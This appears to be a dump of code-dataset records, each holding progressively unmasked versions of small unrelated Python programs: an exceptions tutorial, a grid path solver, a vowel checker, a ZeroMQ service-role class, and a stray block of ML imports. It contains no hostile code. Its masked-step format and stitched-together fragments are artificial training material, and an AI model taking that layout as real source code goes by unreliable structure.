"step-1": "#exceptions.py \n#-*- coding:utf-8 -*-\n\n#exceptions\ntry:\n print u'try。。。'\n r = 10/0\n print 'result:',r\nexcept ZeroDivisionError,e:\n print 'except:',e\nfinally:\n print 'finally...'\nprint 'END'\n\ntry:\n print u'try。。。'\n r = 10/int('1')\n print 'result:',r\nexcept ValueError,e:\n print 'ValueError:',e\nexcept ZeroDivisionError,e:\n print 'ZeroDivisionError:',e\nelse:\n print 'no error!'\nfinally:\n print 'finally...'\nprint 'END'\n\ndef foo(s):\n return 10/int(s)\ndef bar(s):\n return foo(s)*2\ndef main():\n try:\n bar('0')\n except StandardError,e:\n print 'Error!'\n finally:\n print 'finally...'\nmain()\n\ndef foo(s):\n return 10/int(s)\ndef bar(s):\n return foo(s)*2\ndef main():\n bar('0')\n#main()\n\n\nimport logging\n\ndef foo(s):\n return 10/int(s)\ndef bar(s):\n return foo(s)*2\ndef main():\n try:\n bar('0')\n except StandardError,e:\n logging.exception(e)\n finally:\n print 'finally...'\n\nmain()\nprint 'END'\n\nclass FooError(StandardError):\n \"\"\"docstring for FooError\"\"\"\n pass\n\ndef foo(s):\n n = int(s)\n if n == 0:\n raise FooError('invalid value: %s'%s)\n return 10/n\n#foo(0)\n\ndef foo(s):\n n = int(s)\n return 10/n\ndef bar(s):\n try:\n return foo(s)*2\n except StandardError,e:\n print 'Log error and raise'\n raise\ndef main():\n bar('0')\n#main()\n\nimport logging\nimport pdb\nlogging.basicConfig(level=logging.INFO)\ns = '0'\nn = int(s)\n#pdb.set_trace()\nlogging.info('n=%d'%n)\n#print 10/n\n\n#python -m pdb exceptions.py \n#l,n,p,q\n\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
def get_value(li, row, column):
if row < 0 or column < 0:
return 0
try:
return li[row][column]
except IndexError:
return 0
n = int(input())
results = {}
for asdf in range(n):
table = []
title, rows, columns = input().split()
rows = int(rows)
columns = int(columns)
for r in range(rows):
table.append([int(x) for x in input().split()])
flattened = [j for sub in table for j in sub]
sort = sorted(range(len(flattened)), key=lambda k: flattened[k])
distance = [[0 for i in range(columns)] for j in range(rows)]
#print(sort)
maxdist = 0
for i in sort:
r = i//columns
c = i % columns
#print(r)
#print(c)
w = 1
x = 1
y = 1
z = 1
if get_value(table, r, c) == get_value(table, r-1, c):
w = 0
if get_value(table, r, c) == get_value(table, r+1, c):
x = 0
if get_value(table, r, c) == get_value(table, r, c-1):
y = 0
if get_value(table, r, c) == get_value(table, r, c+1):
z = 0
#print(distance)
distance[r][c] = max(max(get_value(distance, r-1, c)*w, get_value(distance, r+1, c)*x),
max(get_value(distance, r, c-1)*y, get_value(distance, r, c+1)*z)) + 1
if distance[r][c] > maxdist:
maxdist = distance[r][c]
results[title] = maxdist
for key in results:
print(key + ": " + str(results[key]))
|
normal
|
{
"blob_id": "badbfdbdeb8b4fd40b1c44bf7dcff6457a0c8795",
"index": 7162,
"step-1": "<mask token>\n",
"step-2": "def get_value(li, row, column):\n if row < 0 or column < 0:\n return 0\n try:\n return li[row][column]\n except IndexError:\n return 0\n\n\n<mask token>\n",
"step-3": "def get_value(li, row, column):\n if row < 0 or column < 0:\n return 0\n try:\n return li[row][column]\n except IndexError:\n return 0\n\n\n<mask token>\nfor asdf in range(n):\n table = []\n title, rows, columns = input().split()\n rows = int(rows)\n columns = int(columns)\n for r in range(rows):\n table.append([int(x) for x in input().split()])\n flattened = [j for sub in table for j in sub]\n sort = sorted(range(len(flattened)), key=lambda k: flattened[k])\n distance = [[(0) for i in range(columns)] for j in range(rows)]\n maxdist = 0\n for i in sort:\n r = i // columns\n c = i % columns\n w = 1\n x = 1\n y = 1\n z = 1\n if get_value(table, r, c) == get_value(table, r - 1, c):\n w = 0\n if get_value(table, r, c) == get_value(table, r + 1, c):\n x = 0\n if get_value(table, r, c) == get_value(table, r, c - 1):\n y = 0\n if get_value(table, r, c) == get_value(table, r, c + 1):\n z = 0\n distance[r][c] = max(max(get_value(distance, r - 1, c) * w, \n get_value(distance, r + 1, c) * x), max(get_value(distance, r, \n c - 1) * y, get_value(distance, r, c + 1) * z)) + 1\n if distance[r][c] > maxdist:\n maxdist = distance[r][c]\n results[title] = maxdist\nfor key in results:\n print(key + ': ' + str(results[key]))\n",
"step-4": "def get_value(li, row, column):\n if row < 0 or column < 0:\n return 0\n try:\n return li[row][column]\n except IndexError:\n return 0\n\n\nn = int(input())\nresults = {}\nfor asdf in range(n):\n table = []\n title, rows, columns = input().split()\n rows = int(rows)\n columns = int(columns)\n for r in range(rows):\n table.append([int(x) for x in input().split()])\n flattened = [j for sub in table for j in sub]\n sort = sorted(range(len(flattened)), key=lambda k: flattened[k])\n distance = [[(0) for i in range(columns)] for j in range(rows)]\n maxdist = 0\n for i in sort:\n r = i // columns\n c = i % columns\n w = 1\n x = 1\n y = 1\n z = 1\n if get_value(table, r, c) == get_value(table, r - 1, c):\n w = 0\n if get_value(table, r, c) == get_value(table, r + 1, c):\n x = 0\n if get_value(table, r, c) == get_value(table, r, c - 1):\n y = 0\n if get_value(table, r, c) == get_value(table, r, c + 1):\n z = 0\n distance[r][c] = max(max(get_value(distance, r - 1, c) * w, \n get_value(distance, r + 1, c) * x), max(get_value(distance, r, \n c - 1) * y, get_value(distance, r, c + 1) * z)) + 1\n if distance[r][c] > maxdist:\n maxdist = distance[r][c]\n results[title] = maxdist\nfor key in results:\n print(key + ': ' + str(results[key]))\n",
"step-5": "def get_value(li, row, column):\r\n if row < 0 or column < 0:\r\n return 0\r\n try:\r\n return li[row][column]\r\n except IndexError:\r\n return 0\r\n\r\n\r\nn = int(input())\r\nresults = {}\r\nfor asdf in range(n):\r\n table = []\r\n title, rows, columns = input().split()\r\n rows = int(rows)\r\n columns = int(columns)\r\n\r\n for r in range(rows):\r\n table.append([int(x) for x in input().split()])\r\n\r\n flattened = [j for sub in table for j in sub]\r\n\r\n sort = sorted(range(len(flattened)), key=lambda k: flattened[k])\r\n\r\n distance = [[0 for i in range(columns)] for j in range(rows)]\r\n #print(sort)\r\n maxdist = 0\r\n for i in sort:\r\n r = i//columns\r\n c = i % columns\r\n #print(r)\r\n #print(c)\r\n w = 1\r\n x = 1\r\n y = 1\r\n z = 1\r\n if get_value(table, r, c) == get_value(table, r-1, c):\r\n w = 0\r\n if get_value(table, r, c) == get_value(table, r+1, c):\r\n x = 0\r\n if get_value(table, r, c) == get_value(table, r, c-1):\r\n y = 0\r\n if get_value(table, r, c) == get_value(table, r, c+1):\r\n z = 0\r\n #print(distance)\r\n distance[r][c] = max(max(get_value(distance, r-1, c)*w, get_value(distance, r+1, c)*x),\r\n max(get_value(distance, r, c-1)*y, get_value(distance, r, c+1)*z)) + 1\r\n if distance[r][c] > maxdist:\r\n maxdist = distance[r][c]\r\n results[title] = maxdist\r\n\r\nfor key in results:\r\n print(key + \": \" + str(results[key])) \r\n\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# Identify a vowel
class MainInit(object):
def __init__(self):
self.vowel = str(input("Please type the character: \n"))
if len(self.vowel) > 1:
print("Invalid number of character")
else:
Vowel(self.vowel)
class Vowel(object):
def __init__(self, vowels):
self.vowels = vowels
self.list = ['a', 'e', 'i', 'o', 'u', 'A', 'E', 'I', 'O', 'U']
for j in range(len(self.list)):
if self.vowels == self.list[j]:
print("The vowel is ", self.list[j])
else:
continue
MainInit()
#
#
# class MainVowel(object):
# def __init__(self):
# string = str(input("Please type the character: \n"))
# if len(string) > 1:
# print("Invalid number of character")
# else:
# VerifyVowel(string)
#
#
# class VerifyVowel(object):
# def __init__(self, string):
# self.string = string
# if len(string) > 1:
# print("Invalid number of character")
# else:
# if string == 'A' or string == 'a':
# print("The vowel is: ", string)
# elif string == 'E' or string == 'e':
# print("The vowel is: ", string)
# elif string == 'I' or string == 'i':
# print("The vowel is: ", string)
# elif string == 'O' or string == 'o':
# print("The vowel is: ", string)
# elif string == 'U' or string == 'u':
# print("The vowel is: ", string)
# else:
# print("No valid")
#
#
# MainVowel()
|
normal
|
{
"blob_id": "8d9f4bce998857bcc7bc2fda0b519f370bf957fe",
"index": 1497,
"step-1": "<mask token>\n\n\nclass Vowel(object):\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Vowel(object):\n\n def __init__(self, vowels):\n self.vowels = vowels\n self.list = ['a', 'e', 'i', 'o', 'u', 'A', 'E', 'I', 'O', 'U']\n for j in range(len(self.list)):\n if self.vowels == self.list[j]:\n print('The vowel is ', self.list[j])\n else:\n continue\n\n\n<mask token>\n",
"step-3": "class MainInit(object):\n <mask token>\n\n\nclass Vowel(object):\n\n def __init__(self, vowels):\n self.vowels = vowels\n self.list = ['a', 'e', 'i', 'o', 'u', 'A', 'E', 'I', 'O', 'U']\n for j in range(len(self.list)):\n if self.vowels == self.list[j]:\n print('The vowel is ', self.list[j])\n else:\n continue\n\n\n<mask token>\n",
"step-4": "class MainInit(object):\n\n def __init__(self):\n self.vowel = str(input('Please type the character: \\n'))\n if len(self.vowel) > 1:\n print('Invalid number of character')\n else:\n Vowel(self.vowel)\n\n\nclass Vowel(object):\n\n def __init__(self, vowels):\n self.vowels = vowels\n self.list = ['a', 'e', 'i', 'o', 'u', 'A', 'E', 'I', 'O', 'U']\n for j in range(len(self.list)):\n if self.vowels == self.list[j]:\n print('The vowel is ', self.list[j])\n else:\n continue\n\n\nMainInit()\n",
"step-5": "# Identify a vowel\r\n\r\n\r\nclass MainInit(object):\r\n def __init__(self):\r\n self.vowel = str(input(\"Please type the character: \\n\"))\r\n if len(self.vowel) > 1:\r\n print(\"Invalid number of character\")\r\n else:\r\n Vowel(self.vowel)\r\n\r\n\r\nclass Vowel(object):\r\n def __init__(self, vowels):\r\n self.vowels = vowels\r\n self.list = ['a', 'e', 'i', 'o', 'u', 'A', 'E', 'I', 'O', 'U']\r\n for j in range(len(self.list)):\r\n if self.vowels == self.list[j]:\r\n print(\"The vowel is \", self.list[j])\r\n else:\r\n continue\r\n\r\n\r\nMainInit()\r\n\r\n\r\n#\r\n#\r\n# class MainVowel(object):\r\n# def __init__(self):\r\n# string = str(input(\"Please type the character: \\n\"))\r\n# if len(string) > 1:\r\n# print(\"Invalid number of character\")\r\n# else:\r\n# VerifyVowel(string)\r\n#\r\n#\r\n# class VerifyVowel(object):\r\n# def __init__(self, string):\r\n# self.string = string\r\n# if len(string) > 1:\r\n# print(\"Invalid number of character\")\r\n# else:\r\n# if string == 'A' or string == 'a':\r\n# print(\"The vowel is: \", string)\r\n# elif string == 'E' or string == 'e':\r\n# print(\"The vowel is: \", string)\r\n# elif string == 'I' or string == 'i':\r\n# print(\"The vowel is: \", string)\r\n# elif string == 'O' or string == 'o':\r\n# print(\"The vowel is: \", string)\r\n# elif string == 'U' or string == 'u':\r\n# print(\"The vowel is: \", string)\r\n# else:\r\n# print(\"No valid\")\r\n#\r\n#\r\n# MainVowel()\r\n",
"step-ids": [
1,
2,
3,
5,
6
]
}
|
[
1,
2,
3,
5,
6
] |
from logging import getLogger
from time import sleep
from uuid import UUID
from zmq import Context, Poller, POLLIN, ZMQError, ETERM # pylint: disable-msg=E0611
from zhelpers import zpipe
from dcamp.service.configuration import Configuration
from dcamp.types.messages.control import SOS
from dcamp.types.specs import EndpntSpec
from dcamp.util.decorators import runnable
@runnable
class RoleMixin(object):
def __init__(
self,
pipe,
ep,
uuid,
):
self.ctx = Context.instance()
self.__control_pipe = pipe
assert isinstance(ep, EndpntSpec)
self.__endpoint = ep
assert isinstance(uuid, UUID)
self.__uuid = uuid
self.__config_service = None
self.logger = getLogger('dcamp.role.%s' % self)
# { pipe: service, ...}
self.__services = {}
def __str__(self):
return self.__class__.__name__
def __send_control_str(self, message):
self.__control_pipe.send_string(message)
def __recv_control(self):
return self.__control_pipe.recv_string()
def get_config_service(self):
return self.__config_service
def get_config_service_kvdict(self):
assert self.__config_service is not None
return self.__config_service.copy_kvdict()
def _add_service(self, cls, *args, **kwargs):
pipe, peer = zpipe(self.ctx) # create control socket pair
# create service, passing local values along with rest of given args
service = cls(peer, self.__endpoint, self.__uuid, self.__config_service, *args, **kwargs)
self.__services[pipe] = service # add to our dict, using pipe socket as key
if Configuration == cls:
self.__config_service = service
def sos(self):
SOS(self.__endpoint, self.__uuid).send(self.__control_pipe)
def play(self):
# start each service thread
for service in self.__services.values():
service.start()
# @todo: wait for READY message from each service / issue #37
self.run_state()
self.logger.debug('waiting for control commands')
# listen for control commands from caller
while self.in_running_state:
try:
msg = self.__recv_control()
if 'STOP' == msg:
self.__send_control_str('OKAY')
self.logger.debug('received STOP control command')
self.stop_state()
break
else:
self.__send_control_str('WTF')
self.logger.error('unknown control command: %s' % msg)
except ZMQError as e:
if e.errno == ETERM:
self.logger.debug('received ETERM')
self.error_state()
break
else:
raise
except KeyboardInterrupt: # only for roles played by dcamp.App
self.logger.debug('received KeyboardInterrupt')
self.stop_state()
break
# role is exiting; cleanup
return self.__cleanup()
def __cleanup(self):
# stop our services cleanly (if we can)
if not self.in_errored_state:
# @todo: this might raise an exception / issue #38
self.__stop()
# shared context; will be term()'ed by caller
# close all service sockets
for pipe in self.__services:
pipe.close()
del self.__services
# close our own control pipe
self.__control_pipe.close()
del self.__control_pipe
self.logger.debug('role cleanup finished; exiting')
def __stop(self):
""" try to stop all of this Role's services """
# send commands
poller = Poller()
for (pipe, svc) in self.__services.items():
pipe.send_string('STOP')
self.logger.debug('sent STOP command to %s service' % svc)
poller.register(pipe, POLLIN)
# give services a few seconds to cleanup and exit before checking responses
sleep(1)
max_attempts = len(self.__services)
attempts = 0
while self.__some_alive() and attempts < max_attempts:
attempts += 1
# poll for any replies
items = dict(poller.poll(60000)) # wait for messages
# mark responding services as stopped
alive = dict(self.__services) # make copy
for (pipe, svc) in alive.items():
if pipe in items:
reply = pipe.recv_string()
if 'STOPPED' == reply:
self.logger.debug('received STOPPED control reply from %s service' % svc)
svc.join(timeout=5) # STOPPED response should be sent right before svc exit
if svc.is_alive():
self.logger.error('%s service is still alive; not waiting' % svc)
else:
self.logger.debug('%s service thread stopped' % svc)
poller.unregister(pipe)
pipe.close()
del (self.__services[pipe])
else:
self.logger.debug('unknown control reply: %s' % reply)
# log some useful info
if len(self.__services) > 0:
msg = '%s services still alive after %d cycles; ' % (
[str(s) for s in self.__services.values()], attempts)
if attempts < max_attempts:
msg += 'waiting'
else:
msg += 'giving up'
self.logger.debug(msg)
def __some_alive(self):
"""returns True if at least one service of this Role is still running"""
for service in self.__services.values():
if service.is_alive():
return True
return False
|
normal
|
{
"blob_id": "fee757b91f8c2ca1c105d7e67636772a8b5eafd5",
"index": 8158,
"step-1": "<mask token>\n\n\n@runnable\nclass RoleMixin(object):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def _add_service(self, cls, *args, **kwargs):\n pipe, peer = zpipe(self.ctx)\n service = cls(peer, self.__endpoint, self.__uuid, self.\n __config_service, *args, **kwargs)\n self.__services[pipe] = service\n if Configuration == cls:\n self.__config_service = service\n <mask token>\n\n def play(self):\n for service in self.__services.values():\n service.start()\n self.run_state()\n self.logger.debug('waiting for control commands')\n while self.in_running_state:\n try:\n msg = self.__recv_control()\n if 'STOP' == msg:\n self.__send_control_str('OKAY')\n self.logger.debug('received STOP control command')\n self.stop_state()\n break\n else:\n self.__send_control_str('WTF')\n self.logger.error('unknown control command: %s' % msg)\n except ZMQError as e:\n if e.errno == ETERM:\n self.logger.debug('received ETERM')\n self.error_state()\n break\n else:\n raise\n except KeyboardInterrupt:\n self.logger.debug('received KeyboardInterrupt')\n self.stop_state()\n break\n return self.__cleanup()\n <mask token>\n\n def __stop(self):\n \"\"\" try to stop all of this Role's services \"\"\"\n poller = Poller()\n for pipe, svc in self.__services.items():\n pipe.send_string('STOP')\n self.logger.debug('sent STOP command to %s service' % svc)\n poller.register(pipe, POLLIN)\n sleep(1)\n max_attempts = len(self.__services)\n attempts = 0\n while self.__some_alive() and attempts < max_attempts:\n attempts += 1\n items = dict(poller.poll(60000))\n alive = dict(self.__services)\n for pipe, svc in alive.items():\n if pipe in items:\n reply = pipe.recv_string()\n if 'STOPPED' == reply:\n self.logger.debug(\n 'received STOPPED control reply from %s service' %\n svc)\n svc.join(timeout=5)\n if svc.is_alive():\n self.logger.error(\n '%s service is still alive; not waiting' % svc)\n else:\n self.logger.debug('%s service thread stopped' % svc\n )\n poller.unregister(pipe)\n pipe.close()\n del self.__services[pipe]\n else:\n self.logger.debug('unknown control reply: %s' % reply)\n if len(self.__services) > 0:\n msg = '%s services still alive after %d cycles; ' % ([str(s\n ) for s in self.__services.values()], attempts)\n if attempts < max_attempts:\n msg += 'waiting'\n else:\n msg += 'giving up'\n self.logger.debug(msg)\n <mask token>\n",
"step-2": "<mask token>\n\n\n@runnable\nclass RoleMixin(object):\n <mask token>\n\n def __str__(self):\n return self.__class__.__name__\n\n def __send_control_str(self, message):\n self.__control_pipe.send_string(message)\n\n def __recv_control(self):\n return self.__control_pipe.recv_string()\n\n def get_config_service(self):\n return self.__config_service\n\n def get_config_service_kvdict(self):\n assert self.__config_service is not None\n return self.__config_service.copy_kvdict()\n\n def _add_service(self, cls, *args, **kwargs):\n pipe, peer = zpipe(self.ctx)\n service = cls(peer, self.__endpoint, self.__uuid, self.\n __config_service, *args, **kwargs)\n self.__services[pipe] = service\n if Configuration == cls:\n self.__config_service = service\n <mask token>\n\n def play(self):\n for service in self.__services.values():\n service.start()\n self.run_state()\n self.logger.debug('waiting for control commands')\n while self.in_running_state:\n try:\n msg = self.__recv_control()\n if 'STOP' == msg:\n self.__send_control_str('OKAY')\n self.logger.debug('received STOP control command')\n self.stop_state()\n break\n else:\n self.__send_control_str('WTF')\n self.logger.error('unknown control command: %s' % msg)\n except ZMQError as e:\n if e.errno == ETERM:\n self.logger.debug('received ETERM')\n self.error_state()\n break\n else:\n raise\n except KeyboardInterrupt:\n self.logger.debug('received KeyboardInterrupt')\n self.stop_state()\n break\n return self.__cleanup()\n\n def __cleanup(self):\n if not self.in_errored_state:\n self.__stop()\n for pipe in self.__services:\n pipe.close()\n del self.__services\n self.__control_pipe.close()\n del self.__control_pipe\n self.logger.debug('role cleanup finished; exiting')\n\n def __stop(self):\n \"\"\" try to stop all of this Role's services \"\"\"\n poller = Poller()\n for pipe, svc in self.__services.items():\n pipe.send_string('STOP')\n self.logger.debug('sent STOP command to %s service' % svc)\n poller.register(pipe, POLLIN)\n sleep(1)\n max_attempts = len(self.__services)\n attempts = 0\n while self.__some_alive() and attempts < max_attempts:\n attempts += 1\n items = dict(poller.poll(60000))\n alive = dict(self.__services)\n for pipe, svc in alive.items():\n if pipe in items:\n reply = pipe.recv_string()\n if 'STOPPED' == reply:\n self.logger.debug(\n 'received STOPPED control reply from %s service' %\n svc)\n svc.join(timeout=5)\n if svc.is_alive():\n self.logger.error(\n '%s service is still alive; not waiting' % svc)\n else:\n self.logger.debug('%s service thread stopped' % svc\n )\n poller.unregister(pipe)\n pipe.close()\n del self.__services[pipe]\n else:\n self.logger.debug('unknown control reply: %s' % reply)\n if len(self.__services) > 0:\n msg = '%s services still alive after %d cycles; ' % ([str(s\n ) for s in self.__services.values()], attempts)\n if attempts < max_attempts:\n msg += 'waiting'\n else:\n msg += 'giving up'\n self.logger.debug(msg)\n <mask token>\n",
"step-3": "<mask token>\n\n\n@runnable\nclass RoleMixin(object):\n <mask token>\n\n def __str__(self):\n return self.__class__.__name__\n\n def __send_control_str(self, message):\n self.__control_pipe.send_string(message)\n\n def __recv_control(self):\n return self.__control_pipe.recv_string()\n\n def get_config_service(self):\n return self.__config_service\n\n def get_config_service_kvdict(self):\n assert self.__config_service is not None\n return self.__config_service.copy_kvdict()\n\n def _add_service(self, cls, *args, **kwargs):\n pipe, peer = zpipe(self.ctx)\n service = cls(peer, self.__endpoint, self.__uuid, self.\n __config_service, *args, **kwargs)\n self.__services[pipe] = service\n if Configuration == cls:\n self.__config_service = service\n\n def sos(self):\n SOS(self.__endpoint, self.__uuid).send(self.__control_pipe)\n\n def play(self):\n for service in self.__services.values():\n service.start()\n self.run_state()\n self.logger.debug('waiting for control commands')\n while self.in_running_state:\n try:\n msg = self.__recv_control()\n if 'STOP' == msg:\n self.__send_control_str('OKAY')\n self.logger.debug('received STOP control command')\n self.stop_state()\n break\n else:\n self.__send_control_str('WTF')\n self.logger.error('unknown control command: %s' % msg)\n except ZMQError as e:\n if e.errno == ETERM:\n self.logger.debug('received ETERM')\n self.error_state()\n break\n else:\n raise\n except KeyboardInterrupt:\n self.logger.debug('received KeyboardInterrupt')\n self.stop_state()\n break\n return self.__cleanup()\n\n def __cleanup(self):\n if not self.in_errored_state:\n self.__stop()\n for pipe in self.__services:\n pipe.close()\n del self.__services\n self.__control_pipe.close()\n del self.__control_pipe\n self.logger.debug('role cleanup finished; exiting')\n\n def __stop(self):\n \"\"\" try to stop all of this Role's services \"\"\"\n poller = Poller()\n for pipe, svc in self.__services.items():\n pipe.send_string('STOP')\n self.logger.debug('sent STOP command to %s service' % svc)\n poller.register(pipe, POLLIN)\n sleep(1)\n max_attempts = len(self.__services)\n attempts = 0\n while self.__some_alive() and attempts < max_attempts:\n attempts += 1\n items = dict(poller.poll(60000))\n alive = dict(self.__services)\n for pipe, svc in alive.items():\n if pipe in items:\n reply = pipe.recv_string()\n if 'STOPPED' == reply:\n self.logger.debug(\n 'received STOPPED control reply from %s service' %\n svc)\n svc.join(timeout=5)\n if svc.is_alive():\n self.logger.error(\n '%s service is still alive; not waiting' % svc)\n else:\n self.logger.debug('%s service thread stopped' % svc\n )\n poller.unregister(pipe)\n pipe.close()\n del self.__services[pipe]\n else:\n self.logger.debug('unknown control reply: %s' % reply)\n if len(self.__services) > 0:\n msg = '%s services still alive after %d cycles; ' % ([str(s\n ) for s in self.__services.values()], attempts)\n if attempts < max_attempts:\n msg += 'waiting'\n else:\n msg += 'giving up'\n self.logger.debug(msg)\n <mask token>\n",
"step-4": "from logging import getLogger\nfrom time import sleep\nfrom uuid import UUID\nfrom zmq import Context, Poller, POLLIN, ZMQError, ETERM\nfrom zhelpers import zpipe\nfrom dcamp.service.configuration import Configuration\nfrom dcamp.types.messages.control import SOS\nfrom dcamp.types.specs import EndpntSpec\nfrom dcamp.util.decorators import runnable\n\n\n@runnable\nclass RoleMixin(object):\n\n def __init__(self, pipe, ep, uuid):\n self.ctx = Context.instance()\n self.__control_pipe = pipe\n assert isinstance(ep, EndpntSpec)\n self.__endpoint = ep\n assert isinstance(uuid, UUID)\n self.__uuid = uuid\n self.__config_service = None\n self.logger = getLogger('dcamp.role.%s' % self)\n self.__services = {}\n\n def __str__(self):\n return self.__class__.__name__\n\n def __send_control_str(self, message):\n self.__control_pipe.send_string(message)\n\n def __recv_control(self):\n return self.__control_pipe.recv_string()\n\n def get_config_service(self):\n return self.__config_service\n\n def get_config_service_kvdict(self):\n assert self.__config_service is not None\n return self.__config_service.copy_kvdict()\n\n def _add_service(self, cls, *args, **kwargs):\n pipe, peer = zpipe(self.ctx)\n service = cls(peer, self.__endpoint, self.__uuid, self.\n __config_service, *args, **kwargs)\n self.__services[pipe] = service\n if Configuration == cls:\n self.__config_service = service\n\n def sos(self):\n SOS(self.__endpoint, self.__uuid).send(self.__control_pipe)\n\n def play(self):\n for service in self.__services.values():\n service.start()\n self.run_state()\n self.logger.debug('waiting for control commands')\n while self.in_running_state:\n try:\n msg = self.__recv_control()\n if 'STOP' == msg:\n self.__send_control_str('OKAY')\n self.logger.debug('received STOP control command')\n self.stop_state()\n break\n else:\n self.__send_control_str('WTF')\n self.logger.error('unknown control command: %s' % msg)\n except ZMQError as e:\n if e.errno == ETERM:\n self.logger.debug('received ETERM')\n self.error_state()\n break\n else:\n raise\n except KeyboardInterrupt:\n self.logger.debug('received KeyboardInterrupt')\n self.stop_state()\n break\n return self.__cleanup()\n\n def __cleanup(self):\n if not self.in_errored_state:\n self.__stop()\n for pipe in self.__services:\n pipe.close()\n del self.__services\n self.__control_pipe.close()\n del self.__control_pipe\n self.logger.debug('role cleanup finished; exiting')\n\n def __stop(self):\n \"\"\" try to stop all of this Role's services \"\"\"\n poller = Poller()\n for pipe, svc in self.__services.items():\n pipe.send_string('STOP')\n self.logger.debug('sent STOP command to %s service' % svc)\n poller.register(pipe, POLLIN)\n sleep(1)\n max_attempts = len(self.__services)\n attempts = 0\n while self.__some_alive() and attempts < max_attempts:\n attempts += 1\n items = dict(poller.poll(60000))\n alive = dict(self.__services)\n for pipe, svc in alive.items():\n if pipe in items:\n reply = pipe.recv_string()\n if 'STOPPED' == reply:\n self.logger.debug(\n 'received STOPPED control reply from %s service' %\n svc)\n svc.join(timeout=5)\n if svc.is_alive():\n self.logger.error(\n '%s service is still alive; not waiting' % svc)\n else:\n self.logger.debug('%s service thread stopped' % svc\n )\n poller.unregister(pipe)\n pipe.close()\n del self.__services[pipe]\n else:\n self.logger.debug('unknown control reply: %s' % reply)\n if len(self.__services) > 0:\n msg = '%s services still alive after %d cycles; ' % ([str(s\n ) for s in self.__services.values()], attempts)\n if attempts < max_attempts:\n msg += 'waiting'\n else:\n msg += 'giving up'\n self.logger.debug(msg)\n\n def __some_alive(self):\n \"\"\"returns True if at least one service of this Role is still running\"\"\"\n for service in self.__services.values():\n if service.is_alive():\n return True\n return False\n",
"step-5": "from logging import getLogger\nfrom time import sleep\nfrom uuid import UUID\n\nfrom zmq import Context, Poller, POLLIN, ZMQError, ETERM # pylint: disable-msg=E0611\nfrom zhelpers import zpipe\n\nfrom dcamp.service.configuration import Configuration\nfrom dcamp.types.messages.control import SOS\nfrom dcamp.types.specs import EndpntSpec\nfrom dcamp.util.decorators import runnable\n\n\n@runnable\nclass RoleMixin(object):\n def __init__(\n self,\n pipe,\n ep,\n uuid,\n ):\n self.ctx = Context.instance()\n self.__control_pipe = pipe\n\n assert isinstance(ep, EndpntSpec)\n self.__endpoint = ep\n\n assert isinstance(uuid, UUID)\n self.__uuid = uuid\n\n self.__config_service = None\n\n self.logger = getLogger('dcamp.role.%s' % self)\n\n # { pipe: service, ...}\n self.__services = {}\n\n def __str__(self):\n return self.__class__.__name__\n\n def __send_control_str(self, message):\n self.__control_pipe.send_string(message)\n\n def __recv_control(self):\n return self.__control_pipe.recv_string()\n\n def get_config_service(self):\n return self.__config_service\n\n def get_config_service_kvdict(self):\n assert self.__config_service is not None\n return self.__config_service.copy_kvdict()\n\n def _add_service(self, cls, *args, **kwargs):\n pipe, peer = zpipe(self.ctx) # create control socket pair\n # create service, passing local values along with rest of given args\n service = cls(peer, self.__endpoint, self.__uuid, self.__config_service, *args, **kwargs)\n self.__services[pipe] = service # add to our dict, using pipe socket as key\n if Configuration == cls:\n self.__config_service = service\n\n def sos(self):\n SOS(self.__endpoint, self.__uuid).send(self.__control_pipe)\n\n def play(self):\n # start each service thread\n for service in self.__services.values():\n service.start()\n\n # @todo: wait for READY message from each service / issue #37\n\n self.run_state()\n self.logger.debug('waiting for control commands')\n\n # listen for control commands from caller\n while self.in_running_state:\n try:\n msg = self.__recv_control()\n\n if 'STOP' == msg:\n self.__send_control_str('OKAY')\n self.logger.debug('received STOP control command')\n self.stop_state()\n break\n else:\n self.__send_control_str('WTF')\n self.logger.error('unknown control command: %s' % msg)\n\n except ZMQError as e:\n if e.errno == ETERM:\n self.logger.debug('received ETERM')\n self.error_state()\n break\n else:\n raise\n except KeyboardInterrupt: # only for roles played by dcamp.App\n self.logger.debug('received KeyboardInterrupt')\n self.stop_state()\n break\n\n # role is exiting; cleanup\n return self.__cleanup()\n\n def __cleanup(self):\n # stop our services cleanly (if we can)\n if not self.in_errored_state:\n # @todo: this might raise an exception / issue #38\n self.__stop()\n\n # shared context; will be term()'ed by caller\n\n # close all service sockets\n for pipe in self.__services:\n pipe.close()\n del self.__services\n\n # close our own control pipe\n self.__control_pipe.close()\n del self.__control_pipe\n\n self.logger.debug('role cleanup finished; exiting')\n\n def __stop(self):\n \"\"\" try to stop all of this Role's services \"\"\"\n\n # send commands\n poller = Poller()\n for (pipe, svc) in self.__services.items():\n pipe.send_string('STOP')\n self.logger.debug('sent STOP command to %s service' % svc)\n poller.register(pipe, POLLIN)\n\n # give services a few seconds to cleanup and exit before checking responses\n sleep(1)\n\n max_attempts = len(self.__services)\n attempts = 0\n\n while self.__some_alive() and attempts < max_attempts:\n attempts += 1\n\n # poll for any replies\n items = dict(poller.poll(60000)) # wait for messages\n\n # mark responding services as stopped\n alive = dict(self.__services) # make copy\n for (pipe, svc) in alive.items():\n if pipe in items:\n reply = pipe.recv_string()\n if 'STOPPED' == reply:\n self.logger.debug('received STOPPED control reply from %s service' % svc)\n svc.join(timeout=5) # STOPPED response should be sent right before svc exit\n if svc.is_alive():\n self.logger.error('%s service is still alive; not waiting' % svc)\n else:\n self.logger.debug('%s service thread stopped' % svc)\n poller.unregister(pipe)\n pipe.close()\n del (self.__services[pipe])\n else:\n self.logger.debug('unknown control reply: %s' % reply)\n\n # log some useful info\n if len(self.__services) > 0:\n msg = '%s services still alive after %d cycles; ' % (\n [str(s) for s in self.__services.values()], attempts)\n if attempts < max_attempts:\n msg += 'waiting'\n else:\n msg += 'giving up'\n self.logger.debug(msg)\n\n def __some_alive(self):\n \"\"\"returns True if at least one service of this Role is still running\"\"\"\n for service in self.__services.values():\n if service.is_alive():\n return True\n return False\n",
"step-ids": [
4,
10,
11,
14,
15
]
}
|
[
4,
10,
11,
14,
15
] |
# import libraries
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
import warnings
import pickle
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import accuracy_score
from sklearn.metrics import mean_squared_error
import math
